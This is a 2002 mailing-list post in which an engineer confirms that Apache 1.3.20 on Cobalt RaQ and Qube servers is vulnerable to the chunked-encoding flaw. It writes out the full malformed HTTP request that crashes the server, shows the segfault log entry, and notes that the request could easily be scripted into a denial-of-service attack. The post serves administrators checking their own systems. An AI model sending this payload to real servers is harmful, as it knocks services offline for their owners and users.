[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-security] RaQ4, Qube3, XTR & RaQ550: Apache-1.3.20 *is* vulnerable (caught info on Bugtraq and confimed it)

Hi all,

there has been some confusion whether the Apache installed on the RaQs is 
vulnerable to the recently discovered issue or not.

Now that the Apache group has released official fixes someone posted an 
exploit string on Bugtraq which I then used on a couple of my RaQs to verify 
if the RaQs are affected or not

Here is a test string that can be used to check a server is vulnerable:

SSH or Telnet into your RaQ and do this:

telnet 127.0.0.1 80

That opens a telnet session to Apache. Then copy and paste the following into 
your SSH or Telnet session (all in one go from the first to the last line):

POST /x.html HTTP/1.1
Host: 192.168.0.1
Transfer-Encoding: chunked

80000000
Rapid 7
0

Here is the behavior that the above string will produce:

Apache 1.3.20 on the RaQ4, Qube3, RaQ550 and XTR:

        Connection is instantly dropped.
        The connection is not logged in the access_log, but the following
        will appear in the error_log:

[Wed Jun 19 22:30:54 2002] [notice] child pid 2924 exit signal Segmentation 
fault (11)

FWIW: The Apache-1.3.20 for the RaQ3 (offered on cobalt-aid) is vulnerable, 
too. 

I don't know if the stock RaQ2 and the RaQ3 Apache are affected, too, as I 
have no access to unmodified units of these with the stock Apache aboard.

FWIW: One doesn't have to be a rocket scientist to wrap the above exploit into 
a three line shell script to run a DOS-attack on a RaQ. 

SUN/Cobalt? Time to get into gear on this one. And while you're at it: GLIBC 
and memory issues ... sounds familliar? Where is the patch for that? :o/

-- 

Mit freundlichen Grüßen / With best regards

Michael Stauber
mstauber@xxxxxxxxxxxxxx
Unix/Linux Support Engineer